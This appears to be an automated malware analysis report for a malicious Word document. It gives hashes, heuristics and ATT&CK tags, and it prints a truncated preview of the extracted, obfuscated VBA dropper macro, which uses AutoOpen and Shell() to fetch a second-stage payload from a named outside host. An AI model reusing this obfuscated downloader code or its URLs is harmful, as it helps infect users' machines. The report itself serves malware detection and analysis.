Office (OLE) malware analysis — malicious · 585c2a90e4928f67

MALICIOUS

Office (OLE)

94.0 KB Created: 2018-02-15 20:31:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: 0379b64a3fa17fa38024bb02c8e016bd SHA-1: 53ee03d85bbb46b4fe60823e75a7b93808c33bc8 SHA-256: 585c2a90e4928f67af7be2d0bdc282b7eb6c90113ae588461a441d31b5268e88

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function and appears to be designed to download and execute a second-stage payload from the reconstructed URL 'http://ccwcm.clamass.net'. This is further supported by ClamAV detection as a dropper.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6450265-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6450265-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 24947 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	24947 bytes
SHA-256: `1a0b4186b830423f578953b1a87e8efa916477034fe8c3faf9f83ecf4866b9d7`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "shsZkajzRu" Function tBZNKmRONAqYw() On Error Resume Next fwXVPwYsrM = 27954 / CLng(ndzZqdmSdFRSJj) - 4967298 * Cos(5929553) + LfWfrGzHDnwmt + 5091346 bvrcDfrKi = 9107171 / CLng(WpwAqfo) - 690648 * Cos(1305337) + QFPuHMEzYpdRw + 4252638 YwzJiLMQEDf = 413976 / CLng(npnjkiWG) - 7438057 * Cos(8115323) + iDfqTYzqsr + 1773977 kTosmlOTnf = (WXhDnmjtkU) + HJjkJKD("CQfuJ+In4SDCmhY'+'+mhY);In4+In4&(In4+In4M49InvomhY+mhYIn4+In4mhY+mhYM49+M49kM4In4+In49In4+mhY7Pv+7Pv+mhYIn4+M49I7Pv+7Pvn4+In4eIn4+In4-ItemIn4+In4M7Pv+7Pv4In4+In49)(dIn4+In4YJ7Pv+7PvIn4+In4SDIn4+In4C);bEDcNkGOUwiSUOzwQSaRtBLOn", 6, 196) jzBfDXzRo = 9790559 / CLng(szfJai) - 1845226 * Cos(229385) + qcQXhwDjjnrDzn + 762534 BiVbCI = 1790449 / CLng(BODHwJHYMuu) - 7704848 * Cos(9296000) + pOcSJSk + 4974456 wsjniaQrhSu = 3976993 / CLng(tOFHHuLcArc) - 9016104 * Cos(9552619) + sTIzVCIskZBoV + 3938186 SMnkz = (zPaJmjIHRiZvs) + HJjkJKD("LWsUmjwZnn4x7Pv+7PvIIn4+ImhY+mhYn4eDFfP/M49.S'+'In4+In4mhY+m7Pv+'+'7PvhYplit(M49?M49);dYJ'+'SIn4+In4D7Pv+7PvC =mhY+mhYIn'+'4+I'+'n4'+'ctnNozKE", 10, 125) jXJotRG = 5853431 / CLng(GSZrhJtAAZb) - 1728628 * Cos(2857432) + iDUqFf + 7540556 mwGwQlrPRVh = 1313571 / CLng(iuEjMXbAO) - 971314 * Cos(4719870) + wrqkdKltrLRbA + 491215 KsINShV = 192872 / CLng(juwszvqzddhdZZ) - 2412297 * Cos(757320) + QkLdFbVBMjXcc + 6203867 rHwcz = (EmuRmaqJlESXA) + HJjkJKD("F7Pv+7Pvbiz/ms27r/?hIn4+In4ttp://ccwcmhY+mhYlamhY+mhYss.netIn4+IihCpOOFJjpofb", 2, 63) HbuAn = 7895508 / CLng(aTcrmOSUA) - 9444787 * Cos(4415834) + vFszKW + 6395703 qLPEFk = 2101536 / CLng(wbsssOZPrws) - 6382695 * Cos(1629262) + AdoHoiYGDGBZM + 1140317 aJNCHkniA = 3102087 / CLng(NkilcrkwuA) - 8726054 * Cos(1082387) + AiZnLr + 3787455 HDKckidb = (DBtHAdIURwNlkS) + HJjkJKD("aY+In4t7Pv+7Pv'+'pIn4+In4://rIn4+In4waIn4+mhY+mhYI7Pv+7Pvn4ndIn4+In4bVKjuoniXWSlvCUNBjuaPEaLrY", 2, 67) DQQKD = 3256347 / CLng(tqNnoT) - 9609135 * Cos(431383) + clBOwFzrBa + 7119310 wwmAzaXBOXk = 3684565 / CLng(HawZGrRXWPuiai) - 456346 * Cos(1021275) + stWKOhAFCLkP + 321892 kcLSXns = 9457017 / CLng(qujmpOMGkDF) - 4226372 * Cos(1202561) + VavmNhrznst + 9556580 iWqLH = (TzQiHDX) + HJjkJKD("MXHKnlWt(7Pv+7PvIn4+7Pv+7PvIn4100InmhY+mhY4+In4mhY+lzlwEpKtqkTIWVZiDRPo", 8, 44) RcAjKZkEWE = 4804518 / CLng(lpcoPotGrsr) - 8900754 * Cos(1611195) + DukDropifW + 7786561 JrXOj = 439698 / CLng(LjiiD) - 9172087 * Cos(4477220) + rjjDawZEXYiXN + 6676967 EDHUqjkDUYi = 2424421 / CLng(IDkqHKGzM) - 6972216 * Cos(6562095) + IKowlfLOEz + 3259110 KliHLQ = (vQQYfnlHJLu) + HJjkJKD("cwCjiPCGMjhXaoFa7Pv+7Pvn4mdr7Pv+7PvIn4).NAmENQVXhJSwwOS", 17, 30) zukoiml = 9790908 / CLng(NkjmhXzUImvajC) - 1573921 * Cos(8061454) + tFGwjonEsdo + 4438648 LYRmocGESQw = 1745494 / CLng(ZRitNdsJFV) - 8028971 * Cos(3419944) + PFGfRrI + 9372631 nwWjwhDu = 2083393 / CLng(zdvshotJzzLWI) - 452464 * Cos(1733956) + MpkAkISaXzmwX + 6163058 jHsKNvlHj = (jnhZjqqQ) + HJjkJKD("tmhY00,In7Pv+7Pv4+InmhY+mhY4 7Pv+7Pv2In4+In4'+'82133)In4+ImhY7Pv+7Pv+mhYn4;dYJIn4+In4A7Pv+7PvDIn4+7Pv+7PvIn4CX =In4+In4 M49 '+'In4+ImhY+mSUmwSDRqffkDOIQjCv", 2, 136) AchlMRz = 9400405 / CLng(WXiTM) - 1964895 * Cos(1494543) + LUUiCulRwhHj + 4181810 twSaRwOop = 8693690 / CLng(adPpXQzYiC) - 6644928 * Cos(5526801) + BjRDRrEzQcSQaa + 3752108 dArZhtw = 3987069 / CLng(NicvDpwVjZLw) - 8198645 * Cos(6203666) + SmQSQDSi + 7900987 AsAirVFB = (lLULMsSCt) + HJjkJKD("obh dIn4+In4YJ'+'In4diBMFGU", 4, 17) kRzsdVvuib = 3370524 / CLng(BZwwwoKBEhuDn) - 3332791 * Cos(8730111) + zzmkfswrTSiS + 5164460 sZLFn = 9121860 / CLng(kNwckEwZI) - 5875838 * Cos(5908764) + KuwMmDCVluhMJb + 1040701 SrOojjI = 5987694 / CLng(GraJMKqqoIk) - 86229 * Cos(4546071) + FBtnzWFvOY + 5048018 GALwIOf = (zEzrUih) + HJjkJKD("OPhMhfsadjTIn4nlIn4+mhY+mhYIn'+'4rIn4+In40IOadFIr0IleIn4+In4GIn4+In4jIn4+In48(dIn4+'+'In4YJaIn4+I'+'n4sfIn4+In4c.I ... (truncated)

SHA-256: 1a0b4186b830423f578953b1a87e8efa916477034fe8c3faf9f83ecf4866b9d7

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "shsZkajzRu"
Function tBZNKmRONAqYw()
On Error Resume Next
fwXVPwYsrM = 27954 / CLng(ndzZqdmSdFRSJj) - 4967298 * Cos(5929553) + LfWfrGzHDnwmt + 5091346
bvrcDfrKi = 9107171 / CLng(WpwAqfo) - 690648 * Cos(1305337) + QFPuHMEzYpdRw + 4252638
YwzJiLMQEDf = 413976 / CLng(npnjkiWG) - 7438057 * Cos(8115323) + iDfqTYzqsr + 1773977
kTosmlOTnf = (WXhDnmjtkU) + HJjkJKD("CQfuJ+In4SDCmhY'+'+mhY);In4+In4&(In4+In4M49InvomhY+mhYIn4+In4mhY+mhYM49+M49kM4In4+In49In4+mhY7Pv+7Pv+mhYIn4+M49I7Pv+7Pvn4+In4eIn4+In4-ItemIn4+In4M7Pv+7Pv4In4+In49)(dIn4+In4YJ7Pv+7PvIn4+In4SDIn4+In4C);bEDcNkGOUwiSUOzwQSaRtBLOn", 6, 196)
jzBfDXzRo = 9790559 / CLng(szfJai) - 1845226 * Cos(229385) + qcQXhwDjjnrDzn + 762534
BiVbCI = 1790449 / CLng(BODHwJHYMuu) - 7704848 * Cos(9296000) + pOcSJSk + 4974456
wsjniaQrhSu = 3976993 / CLng(tOFHHuLcArc) - 9016104 * Cos(9552619) + sTIzVCIskZBoV + 3938186
SMnkz = (zPaJmjIHRiZvs) + HJjkJKD("LWsUmjwZnn4x7Pv+7PvIIn4+ImhY+mhYn4eDFfP/M49.S'+'In4+In4mhY+m7Pv+'+'7PvhYplit(M49?M49);dYJ'+'SIn4+In4D7Pv+7PvC =mhY+mhYIn'+'4+I'+'n4'+'ctnNozKE", 10, 125)
jXJotRG = 5853431 / CLng(GSZrhJtAAZb) - 1728628 * Cos(2857432) + iDUqFf + 7540556
mwGwQlrPRVh = 1313571 / CLng(iuEjMXbAO) - 971314 * Cos(4719870) + wrqkdKltrLRbA + 491215
KsINShV = 192872 / CLng(juwszvqzddhdZZ) - 2412297 * Cos(757320) + QkLdFbVBMjXcc + 6203867
rHwcz = (EmuRmaqJlESXA) + HJjkJKD("F7Pv+7Pvbiz/ms27r/?hIn4+In4ttp://ccwcmhY+mhYlamhY+mhYss.netIn4+IihCpOOFJjpofb", 2, 63)
HbuAn = 7895508 / CLng(aTcrmOSUA) - 9444787 * Cos(4415834) + vFszKW + 6395703
qLPEFk = 2101536 / CLng(wbsssOZPrws) - 6382695 * Cos(1629262) + AdoHoiYGDGBZM + 1140317
aJNCHkniA = 3102087 / CLng(NkilcrkwuA) - 8726054 * Cos(1082387) + AiZnLr + 3787455
HDKckidb = (DBtHAdIURwNlkS) + HJjkJKD("aY+In4t7Pv+7Pv'+'pIn4+In4://rIn4+In4waIn4+mhY+mhYI7Pv+7Pvn4ndIn4+In4bVKjuoniXWSlvCUNBjuaPEaLrY", 2, 67)
DQQKD = 3256347 / CLng(tqNnoT) - 9609135 * Cos(431383) + clBOwFzrBa + 7119310
wwmAzaXBOXk = 3684565 / CLng(HawZGrRXWPuiai) - 456346 * Cos(1021275) + stWKOhAFCLkP + 321892
kcLSXns = 9457017 / CLng(qujmpOMGkDF) - 4226372 * Cos(1202561) + VavmNhrznst + 9556580
iWqLH = (TzQiHDX) + HJjkJKD("MXHKnlWt(7Pv+7PvIn4+7Pv+7PvIn4100InmhY+mhY4+In4mhY+lzlwEpKtqkTIWVZiDRPo", 8, 44)
RcAjKZkEWE = 4804518 / CLng(lpcoPotGrsr) - 8900754 * Cos(1611195) + DukDropifW + 7786561
JrXOj = 439698 / CLng(LjiiD) - 9172087 * Cos(4477220) + rjjDawZEXYiXN + 6676967
EDHUqjkDUYi = 2424421 / CLng(IDkqHKGzM) - 6972216 * Cos(6562095) + IKowlfLOEz + 3259110
KliHLQ = (vQQYfnlHJLu) + HJjkJKD("cwCjiPCGMjhXaoFa7Pv+7Pvn4*mdr*7Pv+7PvIn4).NAmENQVXhJSwwOS", 17, 30)
zukoiml = 9790908 / CLng(NkjmhXzUImvajC) - 1573921 * Cos(8061454) + tFGwjonEsdo + 4438648
LYRmocGESQw = 1745494 / CLng(ZRitNdsJFV) - 8028971 * Cos(3419944) + PFGfRrI + 9372631
nwWjwhDu = 2083393 / CLng(zdvshotJzzLWI) - 452464 * Cos(1733956) + MpkAkISaXzmwX + 6163058
jHsKNvlHj = (jnhZjqqQ) + HJjkJKD("tmhY00,In7Pv+7Pv4+InmhY+mhY4 7Pv+7Pv2In4+In4'+'82133)In4+ImhY7Pv+7Pv+mhYn4;dYJIn4+In4A7Pv+7PvDIn4+7Pv+7PvIn4CX =In4+In4 M49 '+'In4+ImhY+mSUmwSDRqffkDOIQjCv", 2, 136)
AchlMRz = 9400405 / CLng(WXiTM) - 1964895 * Cos(1494543) + LUUiCulRwhHj + 4181810
twSaRwOop = 8693690 / CLng(adPpXQzYiC) - 6644928 * Cos(5526801) + BjRDRrEzQcSQaa + 3752108
dArZhtw = 3987069 / CLng(NicvDpwVjZLw) - 8198645 * Cos(6203666) + SmQSQDSi + 7900987
AsAirVFB = (lLULMsSCt) + HJjkJKD("obh dIn4+In4YJ'+'In4diBMFGU", 4, 17)
kRzsdVvuib = 3370524 / CLng(BZwwwoKBEhuDn) - 3332791 * Cos(8730111) + zzmkfswrTSiS + 5164460
sZLFn = 9121860 / CLng(kNwckEwZI) - 5875838 * Cos(5908764) + KuwMmDCVluhMJb + 1040701
SrOojjI = 5987694 / CLng(GraJMKqqoIk) - 86229 * Cos(4546071) + FBtnzWFvOY + 5048018
GALwIOf = (zEzrUih) + HJjkJKD("OPhMhfsadjTIn4nlIn4+mhY+mhYIn'+'4rIn4+In40IOadFIr0IleIn4+In4GIn4+In4jIn4+In48(dIn4+'+'In4YJaIn4+I'+'n4sfIn4+In4c.I
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.